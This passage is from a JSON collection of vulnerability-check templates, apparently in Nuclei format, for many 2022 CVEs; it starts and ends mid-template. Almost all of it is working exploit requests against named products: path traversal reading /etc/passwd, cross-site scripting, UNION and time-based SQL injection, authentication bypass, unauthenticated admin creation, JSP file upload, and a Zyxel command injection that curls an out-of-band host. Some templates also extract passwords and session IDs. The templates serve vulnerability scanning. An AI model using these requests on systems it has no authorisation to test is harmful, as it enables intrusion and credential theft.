{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47501","info":{"name":"Apache OFBiz < 18.12.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}"],"payloads":{"path":["/etc/passwd","c:/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp","Total execution time is"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;","{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"regex","regex":["^1331' and sleep\\(7\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0342","info":{"name":"Zyxel - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["interface-name","saved at"],"condition":"and"},{"type":"word","part":"header","words":["text/zyxel","attachment; filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/formcraft3/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-27043","info":{"name":"Yearning - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd","{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body) || contains_all(body, '[fonts]', 'for 16-bit app support')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Feed Them Social","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2174","info":{"name":"microweber 1.2.18 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(body, \"<script>alert(document.domain)</script>\") && contains(body, \"microweber\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram 